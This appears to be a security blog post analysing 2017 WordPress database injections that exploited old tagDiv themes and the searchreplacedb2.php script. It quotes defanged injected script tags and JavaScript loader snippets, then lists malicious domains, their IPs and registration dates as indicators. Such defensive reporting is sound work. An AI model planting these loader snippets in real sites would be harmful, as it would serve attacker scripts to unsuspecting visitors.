Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data
<p>Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT Search and Replace scripts (searchreplacedb2.php).</p>
The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.
Typical injected scripts look like this:
<s cript type='text/javascript' src='hxxps://con1.sometimesfree[.]biz/c.js'>
Or:
var t = document.createElement("script");
t.type = "text/javascript"; t.src = "hxxps://src[.]dancewithme[.]biz/src.js";
document.head.appendChild(t);</p>
Or:
</p>The most noticeable malicious URLs that we’ve seen lately are:
- con1.sometimesfree[.]biz/c.js (185.82.217.166 Bulgaria)
- java.sometimesfree[.]biz/counter.js (185.82.217.166 Bulgaria)
- javascript.sometimesfree[.]biz/script.js (185.82.217.166 Bulgaria)
- js.givemealetter[.]biz/script.js (185.82.217.166 Bulgaria)
- go.givemealetter[.]biz/click.html (185.82.217.166 Bulgaria)
- traffictrade[.]life/scripts.js (200.7.105.43 United Kingdom)
- blue.traffictrade[.]life/main.js (200.7.105.43 United Kingdom)
- js.trysomethingnew[.]eu/analytics.js (94.156.144.19 Bulgaria)
- get.simplefunsite[.]info/rw.js (won’t resolve atm)
- post.simplefunsite[.]info/go.php?rewrite=81 (won’t resolve atm)
- src.dancewithme[.]biz/src.js (185.159.82.2 – Russia)
- go.dancewithme[.]biz/red.php (185.159.82.2 – Russia)
They are all new domains registered specifically for this attack:
- traffictrade[.]life – created on July 3rd, 2017
- trysomethingnew[.]eu – created on Aug 11th, 2017
- sometimesfree[.]biz – created on August 22nd, 2017
- givemealetter[.]biz – created on August 27th, 2017
- simplefunsite.info – created on September 2nd, 2017
- dancewithme[.]biz – created on September 5th, 2017
Malware in WordPress Database
In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely not a task you want to do manually!